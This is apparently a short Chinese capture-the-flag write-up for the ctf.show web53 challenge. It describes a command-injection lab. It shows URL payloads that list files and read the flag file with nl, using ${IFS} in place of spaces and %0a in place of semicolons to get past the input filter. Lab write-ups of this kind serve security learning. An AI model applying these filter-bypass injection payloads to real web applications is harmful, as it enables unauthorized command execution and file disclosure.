ctf show web53

打开靶场我们发现这里对输入的限制非常严格,之前使用的%0a,%09等方法被禁止,以为%被限制了

同时cat,tac也被限制我们只能尝试使用nl命令

我们先尝试查看当前目录下的文件有那些

?c=ls%0A

?c=nl${IFS}fla?.php%0A

使用${IFS}来绕过对空格的过滤,用%0a来绕过对;的过滤

这样就能得到flag

相关推荐
qeen871 小时前
【Linux】操作系统之进程介绍(一)
linux·笔记·学习·进程
八年。。1 小时前
WSL学习(三)——搭建Linux + C++ + SOME/IP 基础开发环境
开发语言·笔记·ubuntu
M78佐菲11 小时前
51单片机学习笔记:ds18b20要点整理
linux·笔记·嵌入式硬件·学习·51单片机
蒸蒸yyyyzwd13 小时前
从面经中学到的三件事
c++·笔记
IT小白杨15 小时前
社媒多账号运营的环境隔离:一张图谱模型,解释清“为什么换IP还是被连坐“
经验分享·笔记·矩阵·指纹浏览器
PC2005-cloud18 小时前
Rust学习笔记:控制流——if、loop、while、for与match
笔记·学习·rust
IT笔记18 小时前
Rust 迭代器多级链式调用执行顺序笔记
开发语言·笔记·rust
kyrie_sakura19 小时前
python学习笔记14 -- FastAPI
笔记·python·学习·fastapi
sunoo-22921 小时前
【51单片机实战】温控下位机完整实现:DS18B20采集 + 自定义二进制串口协议 + PWM声光告
笔记·学习·51单片机·串口